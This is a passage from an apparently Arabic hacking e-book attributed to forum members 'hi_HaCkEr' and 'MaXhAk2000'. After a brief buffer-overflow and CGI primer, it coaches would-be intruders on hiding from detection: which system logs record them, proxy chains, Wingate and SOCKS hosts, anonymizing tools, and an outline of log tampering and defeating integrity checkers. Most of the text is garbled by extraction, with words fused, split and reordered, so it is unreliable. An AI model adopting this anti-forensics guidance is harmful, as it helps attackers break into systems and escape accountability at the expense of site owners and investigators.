الإدخال(‏ البیانا ت)‏ منالمستخدمأكبر حجما منالذاكرةالتي خصّصتلهذه البیانات ‏،البیاناتالزائدة ستفی ض<br />

فيالذاكرة التي بعدالاسمالمتغیّ‏ ر؟ هذا المكان من الذاكرة هوالمكان الذي نستفید منهفي<br />

الأختراق.‏<br />

ماذانعملفي ذلك المكان:‏ داخل خط ) مكان)البیاناتالتي ید خلها المستخدم فيالمثالالسابق وهوالاسم<br />

الأول الذي یطلب منقبل البرنامجثمأدخلناه نضعالأوامر الأكثرشعبیةللحاسوب،‏ حی ث هذهالأوامر<br />

تجعل الحاسوب یحد ث(ینتج)هیكل نستطیعاستخدامهفیما بعدللقیامبالسیطرة الكاملةللنظامالمستغلّ.‏<br />

القیامبهذاالعمللی سبیسطاكما یبدولك،إذنلوأردتمعرفةكی فیعمل ‏،أنت یجبأنتقرأ المقالة<br />

القادمة حول Overflows، Buffer الذي سیص فبالضبطكی ف لإ ستغلال واحده منال Buffer<br />

فيا لإختراق<br />

)<br />

(<br />

.<br />

( overflow)<br />

Overflows<br />

٣٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

كانت هذهةمقدمةبسیطة ومهمةللمخترقینلأنها ست ردد علیهمكثیرافي مواقع السیكیورتي حیث یوجد<br />

العدید من الثغرات حول هذه المشاكلامافي وقت المعالجةاوفي الطفحانالحاد ثفي الذاكرةنتیجةلما<br />

سبق ذكره ....<br />

٣٧


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

ال CGI وعلاقتها بالإنترنت<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$$$<br />

م ن ق ول<br />

$$$$$$$$$$$<br />

في هذا المل ف سو ف نقوم بعر ض مقدمةال CGI و علاقتهابالانترنت :<br />

CGI مقدمةلل<br />

(<strong>١</strong>)<br />

CGI=COMMON GATEWAY INTERFACE<br />

هيالواجهةالتيتسمحبالاتصالبین جانب<br />

المستخدم عن طریقالمتصفحأو البرامج و خلافه و جانبالویب سیرفرالذي یفهمبروتوكول<br />

(HTTP)<br />

) ٨٠<br />

.<br />

ال TCP/IP هوالبروتوكول الذي ی ستخدمه سكریبتالسي جيأي والسیرفر أثناءالاتصال ‏.البورت<br />

المحددةلهذالبروتوكولهي من الممكنأن تتغیر هذه البور ت)‏ .<br />

تستطیع سكریبتاتالسي جيأيأنتقوم بتولید صفحات الویب والصور وأیضانتائج محددة طبقا<br />

لمدخلاتمعینه یقوم<br />

مبرمجالسي جيأي بتحدیدها<br />

یقوم عمل سكریبتاتالسي جيأي علي خطوتینأساسیتین<br />

‎<strong>١</strong>‎‏-فيالخطوةالأولى یقوم السكریبت بعملمعالجةأولیهللبیانات التيأدخلتله .<br />

‎٢‎‏-فيالخطوةالثانیةیعملالسكریبتكقناهللبیانات التي یقومالمتصفحبارسالها اليالسیرفرأوالعكس .<br />

یقوم سكریبت السي جيأي بتشفیرالبیانات حتي تتمكن من العملفيأي منا خللعمل.‏<br />

یمكن كتابة سكریبتالسي جيأي بأيلغةبرمجة سواءكانتلغة مجمعة مثلالفیجوالبیسكأولغة<br />

مترجمة مثلالبیرل و الفرقالوحیدبین نوعیناللغات أنالبرنامج المبرمجباللغةالمجمعة سو ف یكون<br />

أسر عفيالتنفیذ ولكناللغاتالمترجمةأسر عفي عملیة التطویر .<br />

للسكریب تاذاأرد تأنتعمل عليتعدیل السكریبتأوتطویره<br />

أهمالأوامر التيتعتبروثیقةالصلهلموضوعناهيكالتالي<br />

هذاالأمر یقومبطلببیانات منالسیرفرللمتصفح .<br />

٢- POST هذاالأمر یطلب منالسیرفرقبول المعلوماتالمدخلةالیه منالمتصفح .<br />

هذا الأمر یطلب منالسیرفرقبول المعلوماتالمرسلهالیهكبدیل عنالمدخلات الموجودة حالیا<br />

:<br />

:<br />

GET -<strong>١</strong><br />

PUT -٣<br />

.<br />

(٢)<br />

نقاط الضع ف :<br />

نقاطالضع ف التي یسببها سكریبت السي جيأيلیسضعفافيالسي جيأي نفسه ولكنه ضع ففي<br />

بروتوكول الHTTPأوفيأنظمةالتشغیلالمختلفة .<br />

السي جيأي یسمحباستغلال نقاط الضع فالموجودة ولكن هناك طرقأخريللوصولاليت حطیم النظام<br />

الأمني ‏.كمثال یمكن الوصولاليالملفاتالغیر محمیةباستخدام ال FTPأو ....TELNET<br />

٣٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

الفصل الثاني<br />

<br />

‏((الحمایةوالتخفي))‏<br />

٣٩


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏"الأمن<br />

و(((التخفي)))‏ في الإنترنت"‏<br />

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$<br />

الكاتب : JawaDal & ال hi_haCker<br />

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$<br />

د‏ ر &<br />

علىكل مخترققبلأن یفكرفياخترقأي موقعانیتعر ف علىكیفبة حمایة وتغطیة اثارهفما هيالفائدة<br />

انتخترق موقعثم یحكم علیككمجرمبالسجنل.......وسو فتنسى بعدهاكل مایتعلقبالاختراق لانك<br />

ستكون مراقب مراقبة شدیدة ‏......الخ<br />

وأكثر نقطةتكون مصیدةلكثیر منالمخترقین هي ملفاتالوجس LOGsفمثلا عند دخولك لا فتيبي<br />

موقع من خلا لأيثغرةكانتفهذایعنيانهتماختراقكبالفعلاذالمتكنقد وضعاحتیاطتكلذلك وحاولت<br />

انتكون !! anonymous<br />

لانكبمجرد الدخولللا فتيبي في حاجهاسمها‎1‎ LOGS...(LOG.FILES) وهنا مرب طالفرس<br />

الكل سیسالالان عن وضیفة هذه ? Logs<br />

الfiles log هيالتيتقوم بتسجیل كل شخ ص اتصلبالجهاز in) loged‏)و ی حصلوا علىمعلومات<br />

مثل :<br />

....<br />

... و مناي موقع اتیت ‏....فصلتأو<br />

وقتالدخول ‏((وقت عملیةالاخترا ق))بالضبط Addressلك<br />

الدوله<br />

المدینه<br />

نظامالتشغیل<br />

صبك(‏provide(ISP Internet server<br />

و مزود الخدمهالخا المتصفح ‏!!!!هل رأیت مدى خطورة هذاالامر وكیفیة سهولةاصطیادك منقبل الجهات المسؤولة عن هذاالموقع<br />

أو غیره<br />

وهنالك ‎٣‎انوا ع<br />

- یسجلكل دخول\خروج،‏ مع میعادالدخول\‏ الخروجبالاضافهالىالhost<br />

‏-من Onlneفي هذهالل حظه<br />

اخر دخول<br />

IP ‏..ال online<br />

‏...الname host ‏(اسمالجهاز)‏ ....<br />

log files مهمه:‏<br />

–<br />

...<br />

!!!...<br />

WTMP<br />

UTMP<br />

LASLOG<br />

والكثیرالكثیر!!لذالوأرادالادمنان یلقي نظره علیهم<br />

(log.files)<br />

(down<br />

سو ف یوقعبك(‏ track you<br />

ربمایتبادرالى ذهنكوتقول ‏:لیست هنالكأي مشاكلانا ساستخدمبروكسیین هنالكامر یجبانتعرفه<br />

عنالبروكسیات<br />

جهازك-->‏ خاد مالبروكسي-->‏ الموقع--‏FTP‏--تلنتاواي شئاخر!‏<br />

لواخترقت موقع والادمنارادانیعر ف مصدرك ومنانت فبقلیل منالمال یستطیعالایقا عبك او حتي<br />

یخترقالبروكسي سیرفر و سیعر ف عنككل شئ نفسالكلاملوكن تتستخدماكثر منبروكسي<br />

جهازك-->‏ خادمالبروكسيالاول-->‏ خادم البروكسيالثاني-->‏<br />

فانباستطاعتهان یصلالیكلكن ذلكیتطلب منه جهدا ومالا<br />

الثالث--‏on ...--so<br />

‏...لكنفيالاخیرباستطاعتهالوصولالیك .<br />

.<br />

..<br />

٤٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

Wingate :-<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

لكنتقدرایضاتستخدم شیئاسمه..‏<br />

Wingate هوبروكسي ولكن مع جدران حمایة وسأتكلم عنهبشئ منالتفصیل لاحقا وهویسمح<br />

بمشاركهكونكشنانترنت واحداواكثر..فائدهالWingateانه سیخفيالIP عنالكمبیوترالذي ست صل<br />

به!!‏<br />

وهذه بع ض الملاحظات یجبانتضعهافي حسبانكفیجبانتعر فكی فتبقى<br />

مثلال . alarm zoneامسح ملفا ت<br />

..web وكی فتؤمن جهازك؟!!......‏<br />

كالكوكیز والانترن تهیستوري و ملفاتالانترنت المؤقته..والملفاتالشخصیه و<br />

اللوق ‏)وهنالكبرنامج رائع یكفیك مؤونة هذه الاعمالاسمه windowsیجبان washer یكونلدیك.‏<br />

anonymous علىال<br />

how to<br />

استخدم firewall<br />

الهیستوري )<br />

والكثیر.اذهبلجوجل و اكتب howاو to Be anonymous on the web<br />

و لاتنسىا لPGP)d‏)‏ Preetyانه Good Privacy مجاني ‏..یجبان یكون عندكلوكنتترید<br />

اختراق موقع و تتركایمیلكفیه!فهو جمیل جدافي عملیةالتشفیر<br />

تستطیعانت حصل علیه من:‏ /http://www.pgpi.org<br />

...<br />

سأشرحالانبشئ منالتفصیللبع ض منالامور الهامة وسنذكر هنا بع ضالطر قللتخفي واخفاءهویتك<br />

: في الشبكة<br />

Proxy - Sock Host - Wingate<br />

-------------------------------------------<br />

Proxy Server<br />

proxy server )<br />

؟؟؟<br />

ما هو ال<br />

خادم الوكیل)هو خادم server نقوم من خلاله بعملیاتالاتصالالمختلفة سواء مع<br />

المواقعاو معالاجهزةالاخرى من خلال الشات وووو ‏..الخ فعند اتصالكبا لإنترنت من خلال proxy<br />

فإن جمیع اتصالاتك سو فتذهبإلى هذاالبروكسيالمستخدمأولا وقبلكل شيءثمیتمالاتصال<br />

بسیرفر الموقع المطلوب لتكونالاجابةهيتحمیلالموقعالمطلوب ‏....فمثلاإ ذاأرد تأن تتصلبا لإنترنت<br />

وتریدأن تتصفحوتفتح موقعاكهذا<br />

.. علیكأولابالطلب من هذا proxyثم server یقوم proxy<br />

من خادم server الموقع ومنثم<br />

serverبطلبالصفحة<br />

تحمیلهاوتخزینهالدیكبمعنىانك سو فتستطیعا ستعر ا ض هذهالصفحة<br />

ستلاحظ من خلال ما ذكرتبالتأكیدأن هذهالعملیةتأخذكمیةقلیلة نالبیاناتمقارنة مع الوقتالمستهلكفي<br />

طلب هذهالصفحةفالوقتأطول وكمیة الباتات الواصلةالینااقل مقارنةبالإتصال العادي ‏(بدونبروكسي)‏<br />

حیث من وقت طلبالصفحة سیتجهالطلب مباشرة منكالى سیرفرالموقعالمطلوب ثمیتمتحمیلها مباشرة<br />

ب حیثتستعرضهافي متصفحكفي وقتاقل ‏...اذن مع اتصالكبللبروكسي سیرفر سو ف یصبح اتصالك<br />

با لإنترن تبطيء مقارنة معالاتصال المباشر وذلكلأنكل صفحةتقوم بتحمیلهاأيتستعرضهاتذهبإلى<br />

ممایؤديالىابطاء عملیةالتصفحالافي حالة نادرة وهوان یكون<br />

هذا البروكسي<br />

البروكسي سیرفرالمستخدمقریب منالمنطقة التيتوجدبهاانت ‏.اوانیتفق وانتٌطلب نفسالصفحة<br />

التيانت طلبتها من شخ صاخرله نفسالبروكسي الذيتستخدمةانتفي وقت سابققبل طلبكلهذه<br />

الصفحة<br />

...<br />

server<br />

من خلالاستخدام proxy server<br />

http://<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong>/<br />

http://<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong>/<br />

proxey server<br />

.<br />

[User] >>>>>>>>>> [Proxy] >>>>>>>>>> [Web Page]<br />

ip<br />

لماذا نستخدم البروكسي سیرفر؟<br />

لعدةاسباب ‏:السبب الرئیسيهوللحفاظ على هویتك والبقاء مجهولافك عملیاتك التيتقومبها على هذه<br />

الشبكةالمكشوفة والمراقبة منالأعینفيكل مكانب حیثانه حتىلوتماصطیادكفاننهم سی حصلون على<br />

البروكسيالمستخدمفي عملیةالاتصال لانههوالذي یقوم بعملیةالاتصالبسیرفرالموقعالمطلوبكما<br />

ذكرنافهوالوسیطبین المستخدم وسیرفرالموقعالمطلوب . وانا لا أقول بأنه لا یمكنالوصولالیك<br />

...<br />

٤<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

یمكن ولكنبصعوبةبالغة وعملیاتتقفي طویلة وممایزید منصعوبتها هواستخدامك لعدد اكبر من<br />

البروكسیات<br />

سبباخراناغلبمزودي الخدمة ISP یقومونب حجبالكثیر من المواقعالمهمةففيكثیر منالدول<br />

كالسعودیة والامارات وغیرها نجدان مواقعالهكر بنسبة مغلقةاواكثر وانا اتكلم علىالمواقع<br />

الاجنبیة ولیستالعربیةالى غیر ذلك ... فهناتضطرالىاللجوءالىالبروكسیا تللوصولالى هذهالمواقع<br />

نقطةهامة ضعهافي حسبانك وهيكلماكانالبروكسيقریبا منالمنطقةالتيانتبهاكاناداء<br />

البروكسياسر ع .<br />

%٤٠<br />

Proxy Chaining ‏(وتعني سلسلةبروكسیات)‏<br />

----------------------<br />

٠...<br />

:<br />

وهيتعتبرفعالة جدافياخفاء الهویةلكنها غیر فعالةتمامافي سرعةالاتصال حیثكلما زاد عدد<br />

البروكسیا تكلمااصبحالاتصالابطأ<br />

مثال/‏<br />

[ User]>>>>>[Proxy 1]>>>>>[Proxy 2]>>>>>[Proxy n]>>>>>[wep page]<br />

ftp<br />

وكما نر ىفانك ست صلبالبروكسيالاولثمبالثانيثمبالثالثثم ‏...الىان تتصلبالموقعالمطلوب ولیسا<br />

شرطابان یكون موقعافقد یكون<br />

اذنفاستخدام سلسلة منالبروكسیا تامر ضروريلكل مخترق و خصوصااذاشعربالخطر وانه مراقب<br />

ویجب علیهانیتوخىالحذر دائما وذلك حسب مبدأ paranoid" " المعرو فلكل هكر<br />

....<br />

‏..الخ .<br />

في نهایةالمطا ف سنتحد ث عنكیفیةال حصول علىالبروكسیات وطریقةاختبارهاوتحدیثها<br />

وهذا المفضللدي<br />

...<br />

.<br />

http://www.multiproxy.org/anon_list.htm<br />

http://tools.rosinstrument.<strong>com</strong>/proxy/<br />

..<br />

او عن طریق مجموعةالبروكسيالشهیر ة عبرالیاهو P_R_O_X_Y@yahoogroups.<strong>com</strong><br />

وهيتقومبمراسلتك بأحد ثالبروكسیات وطریقةالانضمامالیهم هوبارسال رسالةفار غةالیهم وفي<br />

عنوان المرسلالیهاكتب P_R_O_X_Y-subscriber@yahoogroups.<strong>com</strong> و سو فتتلقى<br />

رد مباشرة وتصبح احداعضاء الجروب<br />

وتستطیع التأكد من عملالبروكسي من خلال عدة مواقعتوفرلك هذه الخدمة وأشهرها هو<br />

http://www.proxytester.<strong>com</strong>/<br />

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++<br />

ماهو WinGate؟<br />

هو proxyأي server firewall یفوقالبروكسي وهو خادمبروكسي ذو حاجز ناري یحتوي على<br />

حزمةكبیرة وضخمة منالبرامج المختصةبالحمایة والتيتبقیك)‏ Anonymously مجهول الهویة)‏<br />

wingate<br />

متشابه معالبروكسي سیرفر حی ثیعمل اتصالات معكومبیوترلسیرفر آخر خلال المنفذ , ‎23‎فيالحقیقة<br />

هو اتصال.‏ Telnet<br />

كیفیةال حصول علىWinGate؟<br />

بإ مكانكتاخذ عنوان wingate منأصدقائكإ ذاكانلدىاحد منهم<br />

ایضاتستطیع فعل ذلك من خلالبرامجبحث مختصة بذلك مثل WinGate Scanner حیث یجب علیك<br />

فقطتحدیدال IP والهوست نیم واترك الباقيللبرنامجلیقومبمهامه وللمزید حول هذاالموضو عأنصحكم<br />

بالب حث من خلال خادم الهكرز ‏(جوجل ‏)لأن خبرتيفي هذا المجالقلیلة ولانيلماستخدم هذه الطریقة من<br />

قبل<br />

.<br />

٤٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

Socks Host<br />

؟<br />

ما هو ال<br />

Socksتقریبا Host مثل WinGateلكنالاختلا ف وهوان السوكسیتصل من خلالالمنفذ<br />

وتستطیع التحكمفیه من خلالالاعدادالموجودةفيالمتصفح وذلكامافي<br />

وهذه الطریقةتستخدمكثیرافي Mirc وتقومبحمایتك<br />

وبإ خفاء ip الخا صبكوتعملك FireWall<br />

وستجدونه<br />

وهنالكالعدید منالبرامجالتيقدتساعدفي عملیةالتخفي مثلبرنامج<br />

حتما مناولالنتائج من خلال عملیةب حثبسیطةفي جوجل<br />

<strong>١</strong>٠٨٠<br />

explorer أو<br />

Ghost Surf<br />

...<br />

Socks Host وبإ مكانكإ ضافة netscape<br />

٤٣


hi_HaCkEr & MaXhAk2000<br />

"<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

" حمایة هویتك في النت<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$$$<br />

الكاتب MaXhAk2000:<br />

$$$$$$$$$$$$$$$$<br />

:::<br />

حمایة هویتكفيالنت حتىتصبح مجهولا.‏<br />

**************************************************<br />

هذا هو صلب الموضو ع والذي یأخذ الجانب الأهم>‏ صار مسلسل==‏<br />

یشغل هذا الجانب الأهمیة الكبر ىلد ى الهاكر المحترفین وغیرهم من عدم ملاحقتهم عنداختراقهم وغیره<br />

ولعدمتعرضهمللمقاضاةفي المحاكم والسجون<br />

لهذاهناكقاعدةتقول ‏""">>احم نفسكقبلانتهاجم""">تنبهلناضعلكم<br />

.<br />

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$<br />

‎٣‎‏-هناك طریقةاخر ىلجلبالبروكسیات<br />

استخدامبرامجالب حث عنالبروكسیات ومنها proxy hunter وبرنامج وغیرها<br />

الوصلةلكنانتم علیكم البحثفي


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

‏،لبنان ،<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

مبهمه غیر حقیقه مثلا ‏(فرنسا ‏،كوبا،العراق مصر،‏ افریقاالجنوبیه ( وهكذالكيیتمأخفائك بكل<br />

سهوله وبساطه.‏ وكذلك من میزات ستیجانوس حذ ف خطوات التجسسالمخزنهفي حاسبتك الخاصه<br />

بتصفح الأ نترنتأو نظامالتشغیل(‏ الویندوز ). وأمورأخر ى یجدربناالاشارهالى بعضها :<br />

‏-تنكیروتغییر رقم الأیبيالحقیقي الخا صبكلكي لایمكنكشفك ومعرفههویتك.‏<br />

‏-مسح خطوات التجسس الناتجه منتصفح الأنترنت وخطوات نظامالتشغیل.‏<br />

وغیرها منالمزایاتجدونهافي الشرحفي م نتدیاتبوابةالعرب<br />

http://www.arabsgate.<strong>com</strong>/<strong>vb</strong>/showthread.php?threadid=215946<br />

.<br />

...<br />

‎٣‎‏-استخدامبرنامجJAP<br />

هذا البرنامج یقومبجعلك تتصفحالأنترنتبدونبركسيتكونكل المواقع مفتوحة وهذا البرامجانا مجربة<br />

وشغال میه میه>>>‏ خطوات عمل البرنامج>ارجوا عدماستخدامهفیما لا یرضيااللهعز وجل


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

‏"احمي نفسك وغطي افعالك<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$<br />

الكاتب:‏ DJ KING<br />

$$$$$$$$$$$$$<br />

هذاالموضو ع سیجعلكتخا ف من خیالكوتعملال ف حسابلظلك ‏..لكنانشاله سیكون دفعهللامام ولیس<br />

لانتخاف و تتراجع<br />

اسلوب الموضو ع غ ریب .. و عادة مانتجنبه دائما ‏..بمعنىاخر ‏..كل مناخواننا واساتذتنا من كتبوا<br />

دروسا و شروحافياختراق السیرفرات والمواقعكان همهمالوحیدفيالحمایه هو مسحاللوق log<br />

لكن هل هذا یجعلكفيامانتام ؟!هل هذا سیمنع تتبع اثرك ؟!!‏ هذا ما ستكتشفه بعدالانتهاء من<br />

قراءةالموضو ع<br />

..<br />

!!<br />

"<br />

)<br />

files ..<br />

..<br />

************************<br />

!!<br />

اذاكن تتظنانال حصول علىترجمة الثغرات ) exploites ‏)باسر ع ما یمكن هو ما یجعلك محترفا و<br />

متطورافاسمحليباناقوللك ‏"انكانسان خاطئ واناسلوبتفكیرك غلط<br />

ماذا ستفیدك الثغره الحدیثه جدا ) ٠ dayعندمایتمالقب ض علیكاذا هاجمتاحد ىالسیرفراتالكبیره<br />

؟ و عندها سیتمالسیطره علىاجهزتك وادواتكو مراقبتك ‏!؟!‏<br />

یمكن یر ىالبع ضان هذالمبحد ثقط لاي شخ صنعرفه ؟اوانبلادنالی سفیها هذهالتقنیاتالعالیه<br />

لكن هذاقد یحد ث یوم ما<br />

وایضاانتلاتهاجمفقط سیرفرا تبلدكانما سیرفراتاخرى عالمیه محمیه منقبلالشرطهالدولیه ‏..كما<br />

انه لابد منالحر ص وفهمالاموراذاكنتتریدانتسمي نفسك هكر hackerبمعنىالكلمه<br />

ربماتعتقدفي نفسكانك اكبر منقراءة هذاالموضو ع بكثییر لانك منالمعروفین عنهمبالاحترا فاوانك<br />

تر ى ذلكفي نفسك ‏..لكنانااؤكدلكبانك مخطئ وانتتحتاجلقراءةالموضو ع اليالنهایه<br />

************************<br />

:<br />

=================<br />

الموضو ع مقسمالى ‎٨‎اجزاء<br />

(<br />

:<br />

الجزءالاول ‏:المقدمه ) وهو ماقدقم تانتبالانتهاء منقرائته حالیا<br />

الجزء الثاني ‏:الامورالعقلیه وكی فتصبح " Paranoid "** هذا الجزء سیتم عرضه من خلال هذه<br />

المواضیع<br />

‏-الدافعاوالحافز<br />

‏-لماذاان لابدانتصبح " Paraniod "<br />

**<br />

‏-كیف یمكنانتصبح " Paranoid ‏"؟<br />

‏-وكی فتحافظ علىاسلوبك الجدیداو شخصیتكالجدیده ؟!‏<br />

..<br />

(<br />

-<br />

-<br />

متاكدانمعظمكمیتسائل عن معنى هذهالكلمه سیتمتوضیحمعناها و مفهومها مع شرح هذا الجزء<br />

انشاءاالله.‏<br />

الجزء الثالث ‏:الاساسیاتالتي یجب علیكمعرفتهاقبلانتقومباي عملیةاختراق ‏(و سیتم عرضها من<br />

خلالالنقاطالتالیه<br />

تمهید<br />

‏-امن نفسك<br />

حسابك الخا ص<br />

‏-ملفاتاللو قLoGs<br />

٤٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏-لا تتركاي اثر<br />

‏-امور واشیاء یجبتجنبها و ال حظر منها<br />

الجزء الرابع ‏:التقنیات الحدیثه اليیتي یجب ملاحظتها ) و سیتمعرضه من خلال النقاطالتالیه<br />

تمهید<br />

‏-امنعتقفى اثرك مناي نوع<br />

‏-ایجاداي نو ع منانوا ع ملفاتاللوق lOGs مهماكانفیها منتلاعب<br />

(<br />

..<br />

‏-تحقق منlogfile syslog configuration and<br />

-<br />

-<br />

:<br />

:<br />

-<br />

تحقق من نوعیاتبرامجالامن المثبته<br />

تحقق من وجودالمدراءAdmins<br />

‏-كیف یمكنتص حیح checksum checking software<br />

- حیل المستخدمالامنیه<br />

الجزء الخامس ماذاتفعلان وضعتتحت المراقبه<br />

الجزء السادس ما الذي علیكالقیامبه وایضاالذي لابد من عدمالقیامبهفي حالةانهتمالقب<br />

الجزء السابع ‏:قائمهبافضل البرامجللتخفي والاختباء<br />

الجزء الثامن ‏:كلمه ختامیه ‏........ارجوان تتابعو الموضوعبحر ض وتركیز شدیدن منالان<br />

ض علیك<br />

!!! ...<br />

***************************************************************************************<br />

:<br />

=======<br />

:<br />

*************<br />

..<br />

الجز الثاني<br />

‏-الدافع و الحافز<br />

لابد منت حكیم العقلللنجاحفياي عمل ‏..العقل هوالقوه التي ستدفعك وتحفزك لتصبحانسان واقعي<br />

مسئول و حری ص<br />

المخترق ) Hacker ( الناجح لابد وان تتوفرفیه هذه المبادى ء و الامكانیاتالعقلیه مثلها مثلبناء<br />

عضلاتالجسملن یكبر الجسم ویتقسمالا بعد ممارسةالریاضه الخاصه بذلك ) على سبیلالمثال<br />

مهماكنت متمرساولدیكالكثییر منالمعلومات لابداخذاشدالاحتیاطات و الحذرقبلالقیامباي شئ<br />

(<br />

..<br />

‏-لماذا یجبانتصبح " Paranoid ‏"؟<br />

***************************<br />

" " Paranoiaفياللغهالانجلیزیهتعني جنونالارتیاب<br />

(<br />

) نزعه عندالافرادتجعلكتشكفي جمیع<br />

كلمة<br />

الامور و جمیعالاشخا ص<br />

اعتقدانالاموربدات تتضحلنا بعدمعرفةاصل هذه الكلمه<br />

یمكنان نلخ ض ما ذكر من خلالالكلماتالتالیه paraniod ‏:تعنيانتصبح شدید الحذر والشكفي<br />

جمیعالظرو ف<br />

لماذا یجبتوخي الحذربهذهالطریقه المخیفه ؟!!‏<br />

..<br />

..<br />

..<br />

لانتوقعك دائما الىاسوءالظرو ف یجعلكتسیرفيامان .. و لان ماتفعله هو شئكبییر جدا ماتراه<br />

انت بعینك المجردهانكتغیرالصفحهالرئیسیه اوتقوم بتحمیل بع ضالمعلومات منالسیرفرهو شئ<br />

بسیطبل و سهل جدا<br />

ماذالوانكاخترقت سیرفرمعین وتم رصدك و تتبعك و القب ض علیك منقبل الشرطه ‏!؟!‏ وانك سترمى<br />

في السجنكالسارقین والمجرمین<br />

انكنت لاتهتمبماقد ی حصللك .. علیكالاهتمامبما ماقد یصیباهلك ‏..ابوك ‏...امك ‏..اخوتك ..<br />

٤٧


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

زوجتك واطفالك ‏(انكنت متزوج (<br />

ربمالاتشعربان ماتقومبه هو جریمه ‏..لكنفيالحقیقه هي جریمه<br />

هلتعر ف ماذا سینتظركانتم القب ض علیك ؟!‏<br />

سیتم حرمانك منكلامورالكومبیوتر نظرة الناسالغییر طبیعیهلك ‏(لیست نظرةاعجابانما نظرة<br />

خو ف ( ‏..لنت حظى بفر صالعمل التيتستحقها .. ستسدعى عند حصولاي مشاكلاخرى من هذاالنو ع<br />

‏..لذافانمعظم منیسقطون لا یقومونثانيابدا<br />

!!<br />

!!<br />

..<br />

لذافاصبح حذرا جدا و شكاكا ‏..امن نفسك<br />

اخذ جمیعالاحتیاطات<br />

لاتهتمبماقدیقولهالكثیرون عنكبانك خوا فاو ما شابه<br />

اهتمباي مل ف log مهماكان تقیمتهتافهه<br />

لتصبح hacker علیكانتقوم بعملك سلیما<br />

% <strong>١</strong>٠٠<br />

..<br />

كی فتصبح " Paranoid ‏"؟<br />

*********************<br />

(<br />

)<br />

اذاكنتقرأت ما سبق واقتنعتبهانتبالفعلاصبحت هذا الشخ ص " Paranoid ‏"لكنالاقتناع وحده<br />

لا یكفي و التحمس وحده ولید الل حظهایضا لایكفي ‏...انما لابدان یكونالقلق و التوتر موجودینبشكل<br />

دائمفي حیاتك الالكترونیه<br />

اذاكنت فعلاتریدانتكون هكر حقیقي ... لابدانتعر فلمنتقول هذهالحقیقه وكی ف تتعامل معالاخرین<br />

‏..اعمل حسابانك مراقب دائما وانه هناككامیرا خفیه وراك دائما ‏..فاحذرفيكلامك على الهات ف لانه<br />

قد یكون مراقب ‏..او حتىبریدیكالشخصي والالكتروني ) لابدانتعمل حسابالغیرالمتوقع)‏<br />

اذا ماقد ذكرته لا یهمك وانكانسان غیر مبالي ‏..دعنياسألك هذهالاسئله ؟<br />

هلتریدانیراكالاخرین مجرم ؟ هلتریدانتر ى الحزن و الدمو ع على وجهاهلك ؟هلتریدانت حسر<br />

قلوبهم علیك ؟!‏<br />

هلتریدانتفقداصدقائك ؟ خطیبتك ؟ صحبتك ؟<br />

تذكران الضررلنیعود علیكفقطانما سیعود علىكل منتعرفه<br />

‏-وكیفتحافظ علىاسلوبك الجدیداو شخصیتكالجدیده ؟ !<br />

******************************************<br />

بما انكقداستوعبت ماذكر حتىالان وقرر تانتكونانسان حری ص جدا .. لابدانتبقى هكذا طوال<br />

الوقت<br />

وتذكر هذه الكلمات ‏:ل حظةكسل واحدهفي اتخاذالاحتیاطاتالامنیهقدتغیر حیاتكباكملها ؟!!!!‏<br />

دائماتذكر الدافع<br />

‏-الجزءالثال ث:‏<br />

=========<br />

-<br />

******<br />

تمهید<br />

یجبمعرفة هذهالامور القادمه واستیعابها جیداقبل ممارسةاي عملیةاختراق .. حتىلوكنت مخترق<br />

متمرس لابدانتستوعبالافكار القادمه<br />

٤٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

: ‏-امن نفسك<br />

***********<br />

‏-ماذالوقرأال SysAdmin<br />

رسائلك البریدیهالالكترونیه ؟<br />

‏-ماذالوكانت اتصالاتكالهاتفیه مسجله و مراقبه منقبلالشرطه ؟<br />

